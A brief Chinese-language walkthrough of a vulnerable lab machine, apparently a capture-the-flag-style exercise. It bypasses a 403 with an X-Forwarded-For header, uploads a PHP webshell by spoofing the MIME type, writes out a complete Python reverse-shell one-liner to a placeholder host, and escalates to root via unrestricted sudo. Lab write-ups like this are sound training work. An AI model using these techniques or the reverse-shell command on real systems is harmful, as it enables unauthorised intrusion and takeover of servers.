靶机下载地址:下载链接
主机发现通过arp-scan -l扫描得到靶机的IP地址为10.0.2.4
通过nmap扫描,可以得到靶机只开启了22,80端口(ssh,Apache服务)
打开浏览器访问,发现这个站点还在建设中,但是服务器在运行中
尝试了robots.txt,发现没有该文件,查看源代码也没有什么发现,于是,再用dirsearch扫描一下目录,发现基本上是403,可能权限不够,访问其他200的响应码发现与开始的主页面一样
但是还有一个adminstration的目录,进行访问,结果显示权限不足
通常情况下,出现403的响应码有四种方式可以绕过(旁站访问,路径覆盖,ReFerer绕过和X-Forwarded-For绕过)
这里用X-Forwarded-For: 127.0.0.1可以绕过
这里有个文件上传的地方,我们看能否上传webshell,发现这里应该有过滤,不能直接上传php文件
我们将mime-type更改为png类型就可以绕过
并且上传之后给出了文件路径
访问路径,并将参数?cmd传入id得到www-data
通过python反弹shell python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("x.x.x.x",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' ,得到flag
发现flag是通过base64加密,解密居然得到了ssh登录的账号密码
于是进行ssh登录,登陆之后,查看了sudo,发现所有的操作都可进行
直接sudo -s得到root权限
总结:这个靶机重点是403绕过和文件上传绕过
